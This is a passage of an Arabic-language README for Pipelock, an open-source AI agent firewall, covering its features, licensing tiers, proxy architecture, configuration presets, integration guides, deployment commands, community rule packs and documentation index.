| **منع استنزاف المحفظة (Denial-of-Wallet)** | ميزانيات MCP لكل وكيل لإجمالي استدعاءات الأدوات، وإعادة محاولات نفس الأداة، واكتشاف الحلقات/الدورات، والمدة الزمنية للحائط (wall-clock). |
| **تصعيد التلوث** | تصعيد السياسة القائم على التعرض عبر حدود MCP والمهمة حتى استعادة الثقة. |
| **غلاف الوساطة** | بيانات وصفية جانبية RFC 8941 على طلبات HTTP المُعاد توجيهها و `_meta` MCP، مع التحقق الوارد، وحماية إعادة التشغيل، وتنسيق الفاعل SPIFFE، ودليل مفتاح توقيع RFC 9421. انظر [دليل الاتحاد](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md). |
| **مطابقة الإيصال** | مجموعة التحقق من الإيصال عبر التطبيقات (`sdk/conformance/`) عبر تطبيقات مستقلة بلغات Go، TypeScript، Rust، وPython، بالإضافة إلى سطح wasm للمتصفح مدعوم بـ Go. يستخدم `EvidenceReceipt v2` التطبيع RFC 8785/JCS. يبقى تقييم AARP/SVID في جانب المحقق (verifier) دون اتصال. |
| **تعلم ثم قفل** (v2.4) | عقود سلوكية لكل وكيل: مراقبة حركة المرور، تجميع عقد مرشح موقع، إعادة تشغيل الملاحظات الملتقطة في الظل (shadow)، التصديق لكل قاعدة، ترقية البيان النشط الموقع، والتنفيذ المباشر على الناقلات الحاملة لعناوين URL بالإضافة إلى استدعاءات أدوات MCP. انظر [دليل تعلم ثم قفل](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/learn-and-lock.md). |
| **رأس سبب الحظر** (v2.4) | `X-Pipelock-Block-Reason` على مسارات الحظر القادرة على HTTP، مع نفس مفردات السبب على بيانات الخطأ الوصفية لـ MCP JSON-RPC. انظر [رأس سبب الحظر](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/block-reason-header.md). |
| **حارس كشف الاختراق** (v2.4) | يُرجع `health_watchdog` `/health` 503 عندما تصبح نبضات النظام الفرعي قديمة. انظر [دليل نقطة نهاية الصحة](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/health.md). |
| **شكل إضافة مزود التنقيح** (v2.4) | محللات تنقيح من الطرف الأول لواجهات برمجة تطبيقات الدردشة Anthropic و OpenAI و Gemini، مع شكل إضافة مزود لمحللات الطرف الثالث. |
| **مخطط حزمة التدقيق v0 + المحققين** (v2.5) | مخطط حزمة تدقيق أساسي من الطرف الأول مع تطبيقات محقق بلغات Go و TypeScript و Rust، بالإضافة إلى CLI مستقل [`pipelock-verifier`](https://github.com/luckypipewrench/pipelock/blob/HEAD/cmd/pipelock-verifier/). المخطط موجود تحت [`sdk/audit-packet/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/audit-packet/)؛ حزم المحقق موجودة تحت [`sdk/verifiers/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/verifiers/). |
| **دورة حياة احتواء المضيف** (v2.5) | يدير `pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` نموذج الاحتواء ثلاثي UID. انظر [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md). |
| **قوائم سلامة MCP** (v2.5) | يقوم `pipelock mcp integrity manifest generate / verify / sign / verify-signature` بتثبيت ثنائيات/برامج خادم MCP بواسطة التجزئة ويمكنه طلب توقيع قائمة موثوقة قبل تشغيل العملية الفرعية. انظر [`docs/cli/mcp-integrity.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/mcp-integrity.md). |
| **عقد مشغل MCP لـ Kubernetes** (v2.5) | يُصدر `pipelock init sidecar --mcp-upstream` تكوين المستمع المرافق، منفذ الخدمة، تعليقات عبء العمل، سماح NetworkPolicy، `PIPELOCK_MCP_PROXY_URL`، و `PIPELOCK_MCP_CONFIG` المُركب. انظر [`docs/cli/init-sidecar.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/init-sidecar.md). |
| **الوضع الصارم للاتحاد** (v2.5) | يتطلب التحقق الوارد من غلاف الوساطة فاعلين بتنسيق SPIFFE افتراضيًا، ويتم تطبيق شواهد القبور التعاقدية، ويدير `pipelock envelope trust add/list/remove/verify` الثقة المحلية. انظر [دليل الاتحاد](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md). |
| **سياسة الوسائط** | يزيل البيانات الوصفية المخفية من JPEG/PNG، ويرفض الصوت/الفيديو افتراضيًا، ويقوي محتوى SVG النشط، ويفرض حدود حجم الصورة. انظر [سياسة الوسائط](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/media-policy.md). |
| **تعيينات الامتثال** | OWASP MCP Top 10، OWASP Agentic Top 15، OWASP LLM Top 10، NIST 800-53، قانون EU AI، وتعيينات المشتريات/التدقيق. |
</details>
---
## المجاني، Pro، والمؤسسات
جميع الكشف والتنفيذ والاحتواء والأدلة أحادية الوكيل مجانية للأبد بموجب Apache 2.0. تضيف الطبقات المدفوعة التنسيق متعدد الوكلاء (Pro) وحوكمة الأسطول بالإضافة إلى الامتثال (Enterprise).
| الإمكانية | مجاني | Pro | مؤسسات |
|---|:--:|:--:|:--:|
| المسح والكشف (خط أنابيب URL مرتب، DLP، الحقن، SSRF، تدفق SSE، التنقيح، حماية العنوان) | نعم | نعم | نعم |
| مسح MCP و A2A (الإدخال، الاستجابة، سياسة الأداة، سلسلة الأدوات، التسميم، السلامة، المستمعون الموثوقون) | نعم | نعم | نعم |
| الاحتواء، الصندوق الرملي (sandbox)، `contain` للمضيف، مفتاح إيقاف بـ 6 مصادر | نعم | نعم | نعم |
| إيصالات الإجراءات، مسجل الرحلة، المراسي، عارض الأدلة المجاني، `verify-cert`، المحقق المستقل | نعم | نعم | نعم |
| رموز الكناري (canary tokens)، مسح المهارات، `explain`، Prometheus و Grafana لمثيل واحد | نعم | نعم | نعم |
| ملفات تعريف لكل وكيل: الهوية، الميزانيات، عزل التكوين والماسح، صندوق رملي لكل وكيل | لا | نعم | نعم |
| التوجيه لكل وكيل بواسطة CIDR المصدر ومحدد الشبكة | لا | نعم | نعم |
| لوحة تحكم المشغل: النظرة العامة، الأدلة، الإعفاءات، الوكلاء، الميزانيات، الثقة والمفاتيح | لا | نعم | نعم |
| شهادات تغطية لكل وكيل | لا | نعم | نعم |
| الحجز القانوني والبيانات الوصفية للامتثال | لا | نعم | نعم |
| Conductor مستوى تحكم الأسطول، مغسلة تدقيق `fleet-sink`، القتل عن بعد، الاسترجاع، إعادة تشغيل القرار، الفحص المسبق للانجراف | لا | لا | نعم |
| تسجيل الأتباع عبر mTLS وتوزيع سياسة موقعة موثقة بقائمة الأعضاء | لا | لا | نعم |
| عروض أسطول لوحة التحكم: الأسطول، منصة العمل، الحوادث | لا | لا | نعم |
تقرير `pipelock assess` الموقع هو استحقاق `assess` منفصل، مستقل عن Pro والمؤسسات. درجة التقييم المجانية لم تتغير.
---
## كيف يعمل
يستخدم Pipelock **فصل القدرات**: في النشر المُنفذ، تحتوي عملية الوكيل على أسرار ولكن لا تملك وصولاً مباشراً للشبكة. يمتلك Pipelock وصولاً للشبكة ولكن لا يمتلك أسرار الوكيل. حتى إذا تم حقن الوكيل بتعليمات (prompt-injected)، فلن يتمكن من الوصول إلى ضوابط جدار الحماية.
ثلاثة أوضاع لبروكسي HTTP (نفس المنفذ)، بالإضافة إلى بروكسي MCP مخصص وتفتيش A2A على مسارات التوجيه (forward) و MCP:
- **بروكسي الجلب** (`/fetch?url=...`): يجلب عنوان URL، يستخرج النص، يفحص بحثًا عن الحقن، ويعيد المحتوى النظيف.
- **بروكسي التوجيه** (`HTTPS_PROXY`): نفق CONNECT HTTP قياسي بدون تغييرات في كود التطبيق. لا يزال تكوين البروكسي مطلوبًا. اعتراض TLS اختياري يتيح فحص الحمولة.
- **بروكسي WebSocket** (`/ws?url=ws://...`): فحص الإطارات ثنائي الاتجاه مع كشف DLP + الحقن.
- **بروكسي MCP** (`pipelock mcp proxy`): يغلف خوادم MCP stdio أو HTTP مع فحص ثنائي الاتجاه.
- **تفتيش A2A**: يفحص حركة مرور بروتوكول وكيل إلى وكيل (Agent-to-Agent) من Google أثناء عبورها مسارات التوجيه و MCP.

<details>
<summary>رسم بياني نصي (للطرفيات)</summary>```
┌──────────────────────────────────────────────────────────┐
│ PRIVILEGED ZONE │
│ │
│ AI Agent │
│ - API keys, credentials, private code and context │
│ - Network-isolated by deployment │
└────────────────────────────┬─────────────────────────────┘
│ mediated request
│ fetch / CONNECT / WS / MCP / A2A
▼
┌──────────────────────────────────────────────────────────┐
│ FIREWALL ZONE │
│ │
│ Pipelock Agent Firewall │
│ - Destination: URL, SSRF, and DNS checks │
│ - Data: DLP, secret detection, and budgets │
│ - Content: prompt injection and tool poisoning │
│ - Policy: allow, block, or redact │
│ - No agent secrets │
└────────────────────────────┬─────────────────────────────┘
│ approved request
▼
┌──────────────────────────────────────────────────────────┐
│ INTERNET │
│ │
│ Web APIs, websites, MCP servers, tools, and A2A services │
└──────────────────────────────────────────────────────────┘
Internet -- response --> Pipelock -- scanned content --> AI Agent
التكوين
قم بإنشاء تكوين من قالب مدمج، أو دع pipelock audit يخصص واحدًا لمشروعك:```bash
pipelock presets
pipelock generate config --list
pipelock generate config --preset balanced > pipelock.yaml
pipelock audit ./my-project -o pipelock.yaml
| CLI Preset | Mode | Action | Best For |
|------------|------|--------|----------|
| `balanced` | balanced | warn | أغراض عامة (افتراضي) |
| `strict` | strict | block | صناعات عالية الأمان ومنظمة |
| `audit` | audit | warn | تقييم للسجلات فقط |
| `claude-code` | balanced | block | Claude Code بدون مراقبة |
| `cursor` | balanced | block | بيئة تطوير Cursor |
| `generic-agent` | balanced | warn | وكلاء جدد أثناء الضبط |
| `hostile-model` | strict | block | نماذج غير مراقبة/محذوفة الرقابة |
يتم التقاط تغييرات التكوين من خلال مراقب الملفات أو إشارة SIGHUP. المرجع الكامل: **[docs/configuration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/configuration.md)**
لضبط الإيجابيات الكاذبة: **[docs/false-positive-tuning.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/false-positive-tuning.md)**
---
## أدلة التكامل
- **[Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md):** إعداد وكيل MCP، تكوين `.claude.json`
- **[OpenAI Codex](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/codex.md):** تغليف وكيل MCP، وكيل أمامي، تكامل الصندوق الرملي
- **[Cline](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/cline.md):** تغليف وكيل MCP لملف `mcp.json` الخاص بـ Cline
- **[OpenCode](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/opencode.md):** تغليف وكيل MCP لخوادم MCP المحلية والبعيدة الخاصة بـ OpenCode
- **[Zed](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/zed.md):** تغليف وكيل MCP لكتلة `context_servers` في `settings.json` الخاصة بـ Zed
- **[OpenAI Agents SDK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openai-agents.md):** `MCPServerStdio`، تسليم متعدد الوكلاء
- **[Google ADK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/google-adk.md):** `McpToolset`، `StdioConnectionParams`
- **[AutoGen](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/autogen.md):** `StdioServerParams`، `mcp_server_tools()`
- **[CrewAI](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/crewai.md):** تغليف `MCPServerStdio`، `MCPServerAdapter`
- **[LangGraph](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/langgraph.md):** `MultiServerMCPClient`، `StateGraph`
- **[Hermes](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/hermes.md):** تغطية كامل الإضافات أو تغليف MCP أخف لوكيل Nous Research، مع الحفاظ على الحاوية الجانبية لرأس المصادقة
- **[JetBrains/Junie](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/jetbrains.md):** تغليف وكيل MCP لـ IntelliJ و PyCharm و GoLand ([دليل](https://pipelab.org/learn/jetbrains-integration/))
- **Cursor:** الأمر `pipelock cursor install` يسجل Pipelock كخطاف Cursor لتنفيذ الأوامر واستدعاءات أدوات MCP وقراءة الملفات؛ استخدم `--config` لتضمين مسار سياسة صالح والأمر `pipelock cursor remove` لإزالة الخطافات التي يديرها Pipelock. يمكنك أيضًا استخدام `configs/cursor.yaml` بنفس نمط وكيل MCP المستخدم مع [Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md) ([دليل](https://pipelab.org/learn/cursor-integration/))
- **VS Code:** الأمر `pipelock vscode install` يعيد كتابة `.vscode/mcp.json` لتوجيه كل خادم MCP عبر وكيل MCP؛ الخيار `--global` يستهدف `mcp.json` على مستوى المستخدم
- **[OpenClaw](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openclaw.md):** حاوية جانبية للبوابة، حاوية تهيئة، تغليف التكوين
- **أي عميل MCP آخر:** الأمر `pipelock generate mcporter` يقرأ أي ملف JSON يحتوي على كائن `mcpServers` على المستوى الأعلى ويغلف كل خادم عبر وكيل Pipelock، مما يجعل العميل غير المدرج في القائمة أعلاه يمر عبر الفحص في أمر واحد.
---
## النشر```bash
# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
ghcr.io/luckypipewrench/pipelock:latest \
run --config /config/pipelock.yaml --listen 0.0.0.0:8888
# Network-isolated agent with Docker Compose
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up
# Kubernetes with Helm
helm install pipelock charts/pipelock/
وصفات إنتاجية لـ Docker Compose و Kubernetes sidecar + NetworkPolicy و iptables/nftables و macOS PF: docs/guides/deployment-recipes.md
تكامل CI```yaml
.github/workflows/pipelock.yaml
- uses: luckyPipewrench/pipelock@v2 with: scan-diff: 'true' fail-on-findings: 'true'
يقوم الإجراء بتنزيل ثنائي مُجمّع مسبقًا، ويشغّل `pipelock audit`، ويفحص الفرق (PR diff) بحثًا عن الأسرار المسربة، ويُحمّل تقرير التقييم كقطعة أثرية لسير العمل. راجع [`examples/ci-workflow.yaml`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/ci-workflow.yaml) للحصول على سير عمل كامل.
### Runnable Demo: Tool-Response Injection
يُشغّل إطار [`examples/tool-response-injection/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/tool-response-injection/) عرضًا توضيحيًا من البداية إلى النهاية حيث تُخفي أداة MCP ذات اسم ووصف غير ضارين حمولة حقن موجه (prompt-injection payload) في ردها. يقوم Pipelock بحظر الرد قبل أن يصل إلى الوكيل ويُصدر إيصالات إجراءات موقّعة يمكن لطرف ثالث التحقق منها. يعمل نفس العرض التوضيحي ضد ثلاثة ناقلات باستخدام مفتاح توقيع واحد مشترك:
- MCP stdio
- MCP HTTP upstream
- HTTP fetch```bash
cd examples/tool-response-injection
python3 demo.py # needs python3 + cryptography + pipelock on PATH
قواعد المجتمع
كشف يمكنك توسيعه ومشاركته وشحنه أسرع من الثنائي الأساسي.
كشف DLP المدمج في Pipelock، وكشف الحقن، وكشف تسميم الأدوات قوي خارج الصندوق. تتيح لك حزم قواعد المجتمع الذهاب أبعد: أضف أنماطك الخاصة لأشكال تسريب البيانات، وتنسيقات الأسرار، وحيل الحقن التي يراها مكدسك، وقم بتوقيعها، وشحنها بوتيرة تتحكم فيها بدلاً من انتظار إصدار.
قم بتثبيت الحزمة الرسمية بسطر واحد:
pip install pipelock-rules
``````bash
pipelock rules install pipelock-community
حزم القواعد موقعة ومقفلة الإصدار. دورة الحياة الكاملة هي أمر مُرسَل، وليس تعديل إعدادات:```bash pipelock rules list # what is installed pipelock rules diff pipelock-community # what a new version would change pipelock rules update pipelock-community pipelock rules verify # confirm signatures against the trusted keyring pipelock rules remove pipelock-community
**اكتب بنفسك.** القاعدة هي إدخال YAML صغير يحتوي على اسم وفئة (DLP، injection، أو tool-poison) ونمط. قم بتوقيعها بمفتاحك، ضعها في حزمة، وكل مثيل Pipelock تقوم بتشغيله سيلتقطها. شاركها مع المجتمع وستحمي الجميع أيضًا.
ساهم بقاعدة في الحزمة العامة [pipelock-rules](https://github.com/luckyPipewrench/pipelock-rules)، أو اقرأ [docs/rules.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/rules.md) لبناء وتوقيع قاعدتك الخاصة.
---
## المستندات
دليل المستندات الكامل: [docs/](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/)
| المستند | ما يحتويه |
|----------|-------------|
| [مرجع التهيئة](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/configuration.md) | جميع حقول التهيئة، القيم الافتراضية، سلوك إعادة التحميل السريع، الخيارات المسبقة |
| [سياسة الطلب](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/request-policy.md) | قيود الرفض/التحذير الافتراضية المسموح بها على عمليات API الصادرة (GraphQL / discriminator / batch)، الإغلاق عند الفشل (v2.6) |
| [تنقيح الطلب](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/redaction.md) | إعادة كتابة طلب JSON عبر بروتوكولات HTTP وWebSocket وMCP |
| [ضبط النتائج الإيجابية الكاذبة](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/false-positive-tuning.md) | تحديد وقمع وضبط نتائج الماسح الضوئي |
| [واجهة برمجة التطبيقات للمسح](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/scan-api.md) | نقطة نهاية التقييم للمسح البرمجي |
| [وصفات النشر](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/deployment-recipes.md) | Docker Compose، K8s sidecar، iptables، macOS PF |
| [`pipelock doctor`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/doctor.md) | تشخيص النشر المُهيأ مقابل القابل للتنفيذ للوكيل وTLS وMCP وfile_sentry والقياس عن بُعد وإشارات الاحتواء |
| [`pipelock dashboard`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md) | إعداد لوحة تحكم المشغل: أوضاع المصادقة، أذونات RBAC، الأدلة، الإعفاءات، الميزانيات، الثقة والمفاتيح، عروض الأسطول، النسخ الاحتياطي/الاستعادة، وشهادات التغطية |
| [`pipelock verify-install`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/verify-install.md) | المسح الحتمي، الإثبات المحلي، وفحوصات الدخان للخروج المباشر |
| [`pipelock update`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/update.md) | التحديث الذاتي المُتحقق: بيان الإصدار الموقّع، التحقق من المجموع الاختباري، التحقق التبادلي الاختياري cosign، التثبيت الذري، التراجع |
| [مقاومة الالتفاف](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/bypass-resistance.md) | تقنيات التهرب المعروفة، التخفيفات، القيود |
| [الهجمات المعروفة التي تم حظرها](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/attacks-blocked.md) | هجمات حقيقية مع مقتطفات إعادة الإنتاج |
| [تكامل SIEM](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/siem-integration.md) | مخطط السجل، مخرجات CEF/syslog، التوجيه المؤسسي الدائم، دورة الحياة، المقاييس، استعلامات SIEM |
| [مرجع المقاييس](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/metrics.md) | عائلات مقاييس Prometheus، التصنيفات، إحصائيات JSON، وقواعد التنبيه |
| [قواعد المجتمع](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/rules.md) | تثبيت وتهيئة وإنشاء حزم قواعد موقّعة |
| [ضمان الأمان](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/security-assurance.md) | نموذج الأمان، حدود الثقة، سلسلة التوريد |
| [مستندات الأمان](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/security/) | سياسة الإفصاح، المسارات غير المدعومة، تدوير المفاتيح، نماذج تهديد TLS CA وحزمة التدقيق |
| [الجاهزية المؤسسية](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/enterprise-readiness.md) | ضوابط المؤسسات المُرسلة، مسار التقييم، قرارات النشر، والحدود الصريحة |
| [البنى القابلة للتكرار](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/reproducible-builds.md) | فحص ثنائي OSS بايت ببايت، مدخلات مستقرة، تكامل الإصدار، والنطاق |
| [قمع النتائج](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/suppression.md) | أسماء القواعد، مطابقة المسار، التعليقات المضمنة |
| [أوضاع النقل](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/transport-modes.md) | جميع أوضاع الوكيل وقدرات المسح الخاصة بها |
| [OWASP MCP Top 10](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/compliance/owasp-mcp-top10.md) | تغطية OWASP MCP Top 10 |
| [OWASP Agentic Top 15](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/owasp-agentic-top15-mapping.md) | تغطية OWASP Agentic AI Top 15 |
| [OWASP LLM Top 10](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/owasp-llm-top10-mapping.md) | تغطية OWASP Top 10 لتطبيقات LLM (2025) |
| [قانون AI للاتحاد الأوروبي](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/compliance/eu-ai-act-mapping.md) | تعيين الامتثال لقانون AI للاتحاد الأوروبي |
| [NIST 800-53](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/compliance/nist-800-53.md) | تعيين ضوابط NIST SP 800-53 Rev. 5 |
| [تعيين التقييم](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/compliance/assess-mapping.md) | تعيين ضوابط وقت التشغيل إلى الأطر التي ينتج `pipelock assess` أدلة مقابلها، للمراجعة الشرائية والتدقيق |
| [مواصفات السياسة v0.1](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/policy-spec-v0.1.md) | تنسيق سياسة جدار الحماية المحمول للوكيل |
| [غلاف الوساطة](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/mediation-envelope.md) | رؤوس بيانات وصفية جانبية، التهيئة، التفاعل مع الإيصالات |
| [سياسة الوسائط](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/media-policy.md) | إزالة التضمين، تقوية SVG، الأنواع المسموح بها، حدود الحجم |
| [مصطلحات الأدلة](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/evidence/README.md) | مرجع سريع لـ ActionReceipt وEvidenceReceipt ومسجل الرحلة ونقاط التفتيش والمراسي وشهادات التغطية وحزم التدقيق، مع تمييزات التكامل مقابل الاكتمال والمثبت مقابل غير المثبت |
| [التحقق من الإيصال](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/receipt-verification.md) | `pipelock verify-receipt`، التحقق من تقرير إيصال الأسطول، `pipelock-verifier` المستقل، مجموعة المطابقة، سلامة السلسلة |
| [ملفات تعريف مواصفات الإيصال](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/specs/in-toto-agent-action-receipt-v0.1.md) | مسند شهادة in-toto لإيصالات الإجراءات، مع ملفات تعريف SCITT وAARP المصاحبة وتعيين الأعمال السابقة |
| [نموذج تهديد حزمة التدقيق](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/security/audit-packet-threat-model.md) | ما تثبته حزم التدقيق المُتحقق منها، وما لا تثبته، وافتراضات الثقة التي يجب على الأطراف المعتمدة تثبيتها |
| [تغطية نقل الإيصال](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/receipt-transports.md) | مصفوفة إصدار الإيصال عبر مسارات fetch وforward وCONNECT/TLS وWebSocket وMCP وA2A |
| [التعلم والقفل](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/learn-and-lock.md) | عقود سلوك لكل وكيل: الملاحظة، التجميع، الظل، التصديق، الترقية (v2.4) |
| [الفيدرالية](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md) | التحقق من غلاف الوساطة الوارد، تنسيق العميل SPIFFE، دليل RFC 9421 المعروف (v2.4) |
| [رأس سبب الحظر](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/block-reason-header.md) | مخطط `X-Pipelock-Block-Reason`، مفردات السبب، تلميحات إعادة المحاولة (v2.4) |
| [نقطة نهاية الصحة](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/health.md) | كشف إسفين `/health` 503، نبضات النظام الفرعي، تكوين لوحة تحكم المشغل (v2.4) |
| [احتواء المضيف](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md) | `pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` للاحتواء المطابق لمالك nftables بثلاثة UIDs مع شهادة وضع يُلاحظها النواة (v2.5) |
| [بيانات سلامة MCP](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/mcp-integrity.md) | إنشاء والتحقق والتوقيع وطلب بيانات سلامة ثنائية MCP موثوقة (v2.5) |
| [CLI التكيفي](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/adaptive.md) | فحص ومسح حالة وقت التشغيل للإنفاذ التكيفي عبر API الإداري (v2.5) |
| [الموصل](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md) | مستوى التحكم في أسطول المؤسسات: توزيع السياسات، مصرف التدقيق، القتل عن بُعد، التراجع، ثقة mTLS/SPIFFE، الترخيص (v2.7، مؤسسات) |
| [دليل تشغيل الموصل](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor-operator-runbook.md) | جولة عملية على أسطول محلي: التمهيد، الخدمة، توقيع دفعة، التحقق دون اتصال |
| [بداية سريعة لمشغل الموصل](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor-operator-quickstart.md) | من الصفر إلى تدقيق أسطول للقراءة فقط: الترخيص، شهادة mTLS للمشغل، رمز المدقق، أوامر القراءة فقط |
| [نشر Kubernetes المؤسسي](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/kubernetes-enterprise-deployment.md) | أسطول موصل قائم على Helm: مستوى التحكم، المتابعون، مصرف الأسطول، أسرار PKI، سياسات الشبكة |
| [`pipelock license`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/license.md) | تثبيت وفحص والتحقق من الترخيص الذي يفتح الميزات المدفوعة (Pro `agents`، Enterprise `fleet`) |
| [`pipelock baseline`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md) | فحص والتصديق وإعادة تعلم ملفات تعريف السلوك الأساسي عبر API الإداري المُصادق عليه |
| [كبسولة الوضع](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/posture-capsule.md) | لقطات وضع موقعة، `posture verify` CLI، بوابة CI، نموذج التسجيل |
| [`pipelock init sidecar`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/init-sidecar.md) | إنشاء بيانات تواجد وكيل مصاحب مُنفَّذ لـ Kubernetes وعقود مشغل MCP (دمج استراتيجي، Kustomize، قيم Helm) |
| [`pipelock session`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/session.md) | CLI للمشغل لفحص واسترداد غرفة معادلة الضغط (قائمة، فحص، شرح، تحرير، إنهاء، استرداد) |
| [`pipelock keys status`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/keys.md) | جرد موحد لمفاتيح التوقيع: المصدر لكل غرض، الوجود، قابلية القراءة، الصلاحية، وبصمة المفتاح العام |
| [مسجل الرحلة](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/flight-recorder.md) | سجل أدلة موقّع بسلسلة تجزئة: سلوك افتراضي مفعل، ختم نص النسخة، التنقيح، الضمان، تدوير المفاتيح |
| [اعتراض TLS](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/tls-interception.md) | MITM نفق CONNECT: إعداد CA، مسح الجسم/الرأس/الاستجابة، نطاقات التمرير |
| [رموز الكناري](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/canary-tokens.md) | أسرار اصطناعية تُطلق تنبيهاً فور محاولة وكيل تسريب أحدها |
| [تكامل الكشف](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/detection-integration.md) | تغذية قرارات وأدلة Pipelock إلى خطوط أنابيب الكشف الخارجية / SIEM |
| [مراجعة طلب السحب](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/pr-review.md) | مراجعة أمان AI يدوية التشغيل لطلبات السحب (تعليق `/review`) |
| [واجهة مفتش MCP](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/mcp-inspector-front.md) | تمرير أدوات تطوير MCP (المفتش، خوادم الاختبار) عبر مسح Pipelock |
| [`pipelock demo`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/demo.md) | سيناريوهات هجومية ذاتية الاحتواء مع إيصالات موقّعة وقابلة للتحقق دون اتصال، بدون تكوين أو شبكة |
| [الشارات](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/badges.md) | Markdown قابل للإدراج لشارة `scanned by pipelock` على المشاريع اللاحقة |
---
## هيكل المشروع```text
cmd/pipelock/ CLI entry point
internal/
cli/ 60+ Cobra commands (run, check, init, generate, mcp, session, posture, rules, ...)
diag/ `pipelock doctor` and install-verification diagnostics
session/ `pipelock session`, `pipelock adaptive`, and `pipelock baseline` operator CLIs
setup/ `pipelock init sidecar`: companion-proxy manifest generation (K8s)
config/ YAML config, validation, defaults, hot-reload (fsnotify)
